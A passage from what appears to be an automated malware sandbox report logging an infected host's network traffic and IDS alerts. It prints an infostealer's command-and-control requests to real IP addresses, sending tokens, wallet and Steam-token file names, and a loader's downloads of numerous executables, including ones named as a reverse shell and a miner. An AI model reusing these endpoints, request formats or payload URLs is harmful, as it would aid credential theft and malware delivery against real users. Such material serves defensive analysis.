name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="message"fplugins------JDAKJJDBGCAKKFHIJEGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.215.113.115Content-Length: 5983Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="file"------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="message"wallets------DAAFBAKECAEGCBFIEGDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"files------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file"------GCAKKECAEGDGCBFIJEGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"ybncbhylepme------JKJDBAAAEHIEGCAKFHCG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------ECGIIIDAKJDHJKFHIEBF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 30 33 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071503101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 30 34 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071504021&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071538001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071539001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071540001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071541001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/LostRobotic/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071542001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071543001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1113209401/cBeNU75.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071544001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6875802221/1AWhJsY.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071545001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071546001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071547001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071548001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 31 35 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1071549001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:55224 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55234 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55238 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55260 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55376 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55407 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55428 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55435 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55442 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55450 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55472 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55477 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55479 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55490 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55507 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55522 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55531 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55532 -> 185.215.113.97:80
